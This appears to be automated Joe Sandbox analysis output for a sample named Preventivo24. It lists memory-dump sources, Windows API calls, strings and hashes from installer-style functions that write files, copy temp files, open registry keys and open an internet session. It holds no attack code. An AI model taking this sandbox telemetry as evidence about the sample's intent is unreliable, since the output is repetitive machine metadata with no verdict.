Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 70ede697898dfa4f636c460dc188eb7d88840f30d2b2b85e8b42bb1289547580
Instruction ID: f5e0b1372dadd7b8593d73c3335091686d9ede6bfe8757cdd4c09e7c5930fbf0
Opcode Fuzzy Hash: 70ede697898dfa4f636c460dc188eb7d88840f30d2b2b85e8b42bb1289547580
Instruction Fuzzy Hash: E00196316407547BDB26F721AC47F9D3BD89B12788F0802A0FC85A62D3DBB1B5499293

Uniqueness

Uniqueness Score: -1.00%

Function 00B3FD30 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 304
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetExitCodeThread.KERNEL32(?,?,26FBC52C,00000000,00000000,?,?,?,00000000,00C5C815,000000FF,?,00B38C32,?,000000DC,00000000), ref: 00B3FD76

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B3FE2B
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B3FE55

Part of subcall function 009EA880: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C,00000000,?,?), ref: 009EA8A3

Part of subcall function 00B04450: MultiByteToWideChar.KERNEL32(00000003,00000000,00B47294,000000FF,00000000,00000000,00000000,?,?,00B47294,00CA47A0), ref: 00B04468
Part of subcall function 00B04450: MultiByteToWideChar.KERNEL32(00000003,00000000,00B47294,000000FF,?,-00000001,?,00B47294,00CA47A0), ref: 00B0449A

WriteFile.KERNEL32(?,000000DC,?,000000FF,00000000,CLOSE,00000005), ref: 00B3FFDA
FlushFileBuffers.KERNEL32(?), ref: 00B3FFE3

Part of subcall function 00B63BE0: CloseHandle.KERNEL32(?,26FBC52C,?,00000010,?,00000000,00C63163,000000FF,?,00B3F542,00000000,00000000,00000000,00000001,?,0000000D), ref: 00B63C1A

Strings

Advinst_Estimate_, xrefs: 00B3FDC2, 00B3FDD4, 00B3FDDE
CLOSE, xrefs: 00B3FF9D, 00B3FFAF, 00B3FFB9

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiWide$File$BuffersCloseCodeExitFindFlushHandleHeapProcessResourceThreadWrite
String ID: Advinst_Estimate_$CLOSE
API String ID: 1271795120-755230127
Opcode ID: 89bee771667c8b3712110e0f9fe31751226ac04f21e0f0538567b777977caf99
Instruction ID: 2fdc3622942cd5e5d0d8fdc4ef4e66eae077989a81af5bfa3eb5fd3ce55d7af7
Opcode Fuzzy Hash: 89bee771667c8b3712110e0f9fe31751226ac04f21e0f0538567b777977caf99
Instruction Fuzzy Hash: 4AB1C371A006599BDB01DB68CC94BBEBBF4EF44320F2442A8F915A73E1DB349E05DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B27A40 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 286
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,26FBC52C,00000000,00000000,?), ref: 00B27A9B
GetTempFileNameW.KERNEL32(?,shim_clone,00000000,?,?,00000000,00000000), ref: 00B27C3D
Wow64DisableWow64FsRedirection.KERNEL32(00000000,?,?,00000000,00000000), ref: 00B27CE4
CopyFileW.KERNEL32(?,?,00000000,?,?,00000000,00000000), ref: 00B27D06
Wow64RevertWow64FsRedirection.KERNEL32(00000000,?,?,00000000), ref: 00B27D32

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

DeleteFileW.KERNEL32(?,26FBC52C,00000000,00000000,Function_00231B50,000000FF,?,80070057,80004005,?), ref: 00B27DED

Strings

shim_clone, xrefs: 00B27C37

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Wow64$File$Redirection$AllocateCopyDeleteDisableFolderHeapNamePathRevertTemp
String ID: shim_clone
API String ID: 4011074531-3944563459
Opcode ID: c3ff16dae59520bc67dda61c32db9ac4270a5af3393835a01595151b032e4709
Instruction ID: 99e39832db9f877adf3e514debbacdc11fed4faf82aee2e6b10d3f4e2a78f31d
Opcode Fuzzy Hash: c3ff16dae59520bc67dda61c32db9ac4270a5af3393835a01595151b032e4709
Instruction Fuzzy Hash: 20B116B09442689FDB24DB24DC45BBEB7F4EF45310F1440E9E90AA7292EF70AE45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00B1AD40 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 252
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,26FBC52C), ref: 00B1AF96
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00B1AFAA
RegCloseKey.ADVAPI32(00000000), ref: 00B1B00C

Strings

Advapi32.dll, xrefs: 00B1AF91
RegOpenKeyTransactedW, xrefs: 00B1AFA4

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 4190037839-3913318428
Opcode ID: 222451f996e981293367ebf9e2d3e5551a2113e581aa5da7a57e582ebab2a52a
Instruction ID: d12f7a92d037b91be5c096a3b7532888f17072b8fe7abf0ce21a0353ea533c14
Opcode Fuzzy Hash: 222451f996e981293367ebf9e2d3e5551a2113e581aa5da7a57e582ebab2a52a
Instruction Fuzzy Hash: A1A15DB1D00248DFDB24DFA8C849B9EBBF4FF48304F608599E455E7291DB74AA84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B49A70 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 248
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,?), ref: 00B49C6E
SetFilePointer.KERNEL32(?,7FFFFFFF,00000000,00000000,?), ref: 00B49CD0
SetEndOfFile.KERNEL32(?), ref: 00B49CD9
FindCloseChangeNotification.KERNEL32(?), ref: 00B49CF2

Strings

Not enough disk space to extract file:, xrefs: 00B49B4B
%sholder%d.aiph, xrefs: 00B49C4A

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointer
String ID: %sholder%d.aiph$Not enough disk space to extract file:
API String ID: 3635197886-929304071
Opcode ID: eec98936e07603b986ea871175c0feaa5ee7320958974e7453bcfd49bca38ef3
Instruction ID: cdbf455ce4b31ca5beaddef81cd50c16f2d27113ac748e9ce286e850df5fdada
Opcode Fuzzy Hash: eec98936e07603b986ea871175c0feaa5ee7320958974e7453bcfd49bca38ef3
Instruction Fuzzy Hash: D891A075A002099BDB15DF68DC45BAFB7F5FF88320F244299E925A7391DB31AE01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B685F0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(000000FF,-00000400,?,00000002,00000400,26FBC52C,?,?,?), ref: 00B68696
GetLastError.KERNEL32(?,?,?), ref: 00B686A4
ReadFile.KERNEL32(000000FF,00000000,00000400,?,00000000,?,?,?), ref: 00B686BF

Strings

ADVINSTSFX, xrefs: 00B686F3, 00B687AE

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$ErrorLastPointerRead
String ID: ADVINSTSFX
API String ID: 64821003-4038163286
Opcode ID: 27c9a30e68fa8a5b1a21488d82c6bfff2cc2364796c2e8518017463042a44041
Instruction ID: 57ba9afd4f89b5890aa7c5647a4b613644ae0215de1bcde532d4c210948c5688
Opcode Fuzzy Hash: 27c9a30e68fa8a5b1a21488d82c6bfff2cc2364796c2e8518017463042a44041
Instruction Fuzzy Hash: 7F61CFB5A002499FDB14CF68C894BBEBBF5FB45324F2443A9E405A7281DB389D41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00B1D2E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 179fileCOMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,00000000,?,?,00C16CAD,000000FF,?,00B1D638,?), ref: 00B1D390

Part of subcall function 009EA880: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C,00000000,?,?), ref: 009EA8A3

RemoveDirectoryW.KERNEL32(?,26FBC52C,?,?,00000000,?,?,00C16CAD,000000FF,?,00B1D638,?,00000000), ref: 00B1D3CB
GetLastError.KERNEL32(?,26FBC52C,?,?,00000000,?,?,00C16CAD,000000FF,?,00B1D638,?,00000000), ref: 00B1D3DB
DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,00000000,?,00000000,00C16CAD,000000FF,?,80004005,26FBC52C), ref: 00B1D4B0
GetLastError.KERNEL32(?,?,00000000,?,00000000,00C16CAD,000000FF,?,80004005,26FBC52C,?,?,00000000,?,?,00C16CAD), ref: 00B1D4FB

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

Strings

\\?\, xrefs: 00B1D351, 00B1D363, 00B1D36D, 00B1D471, 00B1D483, 00B1D48D

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: DirectoryErrorLastRemove$DeleteFileFindHeapProcessResource
String ID: \\?\
API String ID: 728736790-4282027825
Opcode ID: c9707943572fd5a7347975a7e0050796584e501f80b17a8f940443a3b71b6ccb
Instruction ID: f751b0e6a67875d2063d08205f1740a2458567ac768c6bce42bc40e1f2e0d551
Opcode Fuzzy Hash: c9707943572fd5a7347975a7e0050796584e501f80b17a8f940443a3b71b6ccb
Instruction Fuzzy Hash: D251D076A006599FCB01DFA8DC58BAEB7F4FF09320F5442A9E821D7390DB74AD408B91

Uniqueness

Uniqueness Score: -1.00%

Function 009FC1B1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 009FC25F
GetWindowLongW.USER32(?,000000FC), ref: 009FC26E
CallWindowProcW.USER32(?,?,00000082,?,?), ref: 009FC289
GetWindowLongW.USER32(?,000000FC), ref: 009FC2A3
SetWindowLongW.USER32(?,000000FC,?), ref: 009FC2B5

Strings

$, xrefs: 009FC1E1

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: c2fb4484772c29f7424e86de5f248b281473ea8f02b97532b8707f04b71524a0
Instruction ID: 864a1b2380ad12b040eda228e65e96fd472fe8ad61286ad9804eecd802aa058e
Opcode Fuzzy Hash: c2fb4484772c29f7424e86de5f248b281473ea8f02b97532b8707f04b71524a0
Instruction Fuzzy Hash: 174148B160870AAFC700DF59C884A6AFBF5FB88760F108A09F96593760C772E954DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B06570 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 99registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,26FBC52C,00000000), ref: 00B065B5
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 00B065DE
RegCreateKeyExW.KERNEL32(?,00B1B09F,00000000,00000000,00000000,00000000,00000000,00000000,?,26FBC52C,00000000), ref: 00B06637
RegCloseKey.ADVAPI32(00000000), ref: 00B0664A

Strings

RegCreateKeyTransactedW, xrefs: 00B065D8
Advapi32.dll, xrefs: 00B065B0

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AddressCloseCreateHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedW
API String ID: 1765684683-2994018265
Opcode ID: cb262e565d664bbb14ca4bab2657e7a29644ecce49e7cb342b9bfe3666a9749c
Instruction ID: ba10ac1e8bafaa2016ffe37d68986105c2a62fbefca58d613d909388f824b8b2
Opcode Fuzzy Hash: cb262e565d664bbb14ca4bab2657e7a29644ecce49e7cb342b9bfe3666a9749c
Instruction Fuzzy Hash: B3319132A04219AFDB248F54DC45FEABBB8FB04710F10416AF905E62D0EB72A954CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B41DC0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000002), ref: 00B41DDD
GetWindowRect.USER32(00000000,?), ref: 00B41DF3
ShowWindow.USER32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00B4BA1D), ref: 00B41E08
InvalidateRect.USER32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00B4BA1D), ref: 00B41E13
GetDlgItem.USER32(?,000003E9), ref: 00B41E21
GetWindowRect.USER32(00000000,?), ref: 00B41E37
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,00000000), ref: 00B41E76

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Window$Rect$Item$InvalidateShow
String ID:
API String ID: 2147159307-0
Opcode ID: c5110c86879619b64f588266b8364d23a41915293cd6375b2102e6b931258d0a
Instruction ID: c6abbebdfb1fff93b14d6e562be93aeac26634bc97a22d6d423eef4a2bce51e6
Opcode Fuzzy Hash: c5110c86879619b64f588266b8364d23a41915293cd6375b2102e6b931258d0a
Instruction Fuzzy Hash: E7216D71604701AFD310DF38DD49A6BBBE9FF89B00F008619F855D2690EB70AD508BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00B5AA40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,00B5877A,00000000,26FBC52C,?,?,00000000), ref: 00B5AA4E
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,00B5877A,00000000,26FBC52C,?,?,00000000), ref: 00B5AA79
InternetOpenW.WININET(AdvancedInstaller,00000003,?,00000000,10000000), ref: 00B5AACF
GetLastError.KERNEL32(00B5877A,00000000,26FBC52C,?,?,00000000,?,?,?,?,?,00C61115,000000FF,?,00B581B2,?), ref: 00B5AAE3
InternetSetStatusCallbackW.WININET(00000000,00B5AB00), ref: 00B5AAF2

Strings

AdvancedInstaller, xrefs: 00B5AACA

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CreateEventInternet$CallbackErrorLastOpenStatus
String ID: AdvancedInstaller
API String ID: 2592705480-1372594473
Opcode ID: bdb5d8462b84cc3641da3bdc2f145f3d7b355de3b6050fe6e0e01430a043dcb7
Instruction ID: d44d56305e3241b5da2042774fcd53396d92c42036f9a421c09d922db163aa2d
Opcode Fuzzy Hash: bdb5d8462b84cc3641da3bdc2f145f3d7b355de3b6050fe6e0e01430a043dcb7
Instruction Fuzzy Hash: 64215C31640308AFDB10AF21DD99B2A7BE9FB44705F1041A9FD01AB2A6DB71A845CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00B69BA0 Relevance: 9.3, APIs: 6, Instructions: 334synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,26FBC52C,00000000,?), ref: 00B69BE0
CreateThread.KERNEL32(00000000,00000000,00B69FB0,?,00000000,?), ref: 00B69C30
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00B69D56
GetExitCodeThread.KERNEL32(00000000,?), ref: 00B69D61
CloseHandle.KERNEL32(00000000), ref: 00B69D81

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

WaitForSingleObject.KERNEL32(?,000000FF,26FBC52C,?,?,?), ref: 00B69DE4

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
